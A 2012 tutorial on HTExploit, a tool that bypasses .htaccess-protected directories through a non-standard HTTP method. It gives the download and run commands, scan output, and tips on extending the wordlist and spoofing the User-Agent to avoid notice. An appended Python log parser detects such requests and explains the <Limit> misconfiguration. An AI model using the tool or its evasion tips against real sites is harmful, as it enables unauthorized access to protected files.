Aug 02, 2012

Why not write a little tutorial on how to use HTExploit (http://www.mkit.com.ar/labs/htexploit/), the new tool I discovered at Black Hat 2012.

Requirements: Linux + Python + wget

Let's get the tool and extract it:

wget -c http://www.mkit.com.ar/labs/htexploit/files/source/HTExploit_v0.7b.tar.gz
tar xvfp HTExploit_v0.7b.tar.gz
cd HTExploit_v0.7b

Now, if the .htaccess-protected website you want to attack is http://example.com/secure/, you will have to type:

sheeva :/tmp/HTExploit_v0.7b# ./htexploit -u http://example.com/secure/

[HTExploit ASCII-art banner, v0.7b]

[+] http://example.com/secure seems exploitable. Enjoy :)

Would you like to run the 'full' scan module? [Y/n]

[+] Full Scan Completed.
[+] 6 files were downloaded, out of 762 (0% success rate). Report was saved in '/tmp/HTExploit_v0.7b/htexploit-91450'

sheeva :/tmp/HTExploit_v0.7b#

Tips:

If you want to add custom files to the wordlist (like connect.php or dbconnection.php), add them to the file "res/Fulllist". If you want to change the request method (POTATO by default), edit it in "lib/Conn.py". I would also change the User-Agent from "Python X.X" to something like Mozilla or Chrome: edit "lib/Conn.py" and add

opener.addheaders = [('User-agent', 'Mozilla/5.0')]
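On the defending side, the two things the tips above touch (the non-standard request method and the default Python User-Agent) are exactly what stands out in a web server's access log. The following Python script is an added example, not part of HTExploit or this post: it parses Apache combined-format log lines (the sample lines are constructed) and flags requests to a protected path that use an unknown HTTP method or a Python client, reporting which of them the server answered with a 2xx instead of a 401 challenge. The protected prefix "/secure/" is an assumption taken from the example URL above.

```python
import re
from collections import Counter

# Constructed sample of Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [02/Aug/2012:10:01:02 +0000] "GET /secure/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Aug/2012:10:01:05 +0000] "POTATO /secure/ HTTP/1.1" 200 1523 "-" "Python-urllib/2.7"
203.0.113.5 - - [02/Aug/2012:10:01:06 +0000] "POTATO /secure/connect.php HTTP/1.1" 404 210 "-" "Python-urllib/2.7"
203.0.113.5 - - [02/Aug/2012:10:01:07 +0000] "POTATO /secure/config.php HTTP/1.1" 200 880 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Aug/2012:10:02:00 +0000] "POST /secure/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Methods a normal browser or API client is expected to use; anything else is suspicious.
STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "TRACE", "CONNECT"}

# Apache "combined" log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_method_bypass(log_text, protected_prefixes=("/secure/",)):
    """Return (alerts, per_ip_counts). An alert is a request to a protected prefix
    that uses a non-standard HTTP method or a Python client. 'served' is True when
    the server answered 2xx, i.e. content came back without an auth challenge."""
    alerts, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["path"].startswith(protected_prefixes):
            continue
        odd_method = rec["method"] not in STANDARD_METHODS
        python_ua = rec["ua"].lower().startswith("python")
        if odd_method or python_ua:
            alerts.append({"ip": rec["ip"], "method": rec["method"], "path": rec["path"],
                           "status": rec["status"], "ua": rec["ua"],
                           "served": rec["status"].startswith("2")})
            per_ip[rec["ip"]] += 1
    return alerts, per_ip

if __name__ == "__main__":
    found, counts = find_method_bypass(SAMPLE_LOG)
    for a in found:
        flag = "SERVED WITHOUT AUTH" if a["served"] else "blocked/missing"
        print(f'{a["ip"]} {a["method"]} {a["path"]} -> {a["status"]} [{flag}] ua={a["ua"]}')
    print("suspicious requests per source:", dict(counts))
```

A 2xx answer to an unknown method on a path that returns 401 for GET means the .htaccess restriction only covers the methods listed in its `<Limit>` block; auth directives placed outside any `<Limit>` (or inside `<LimitExcept>`) apply to every method.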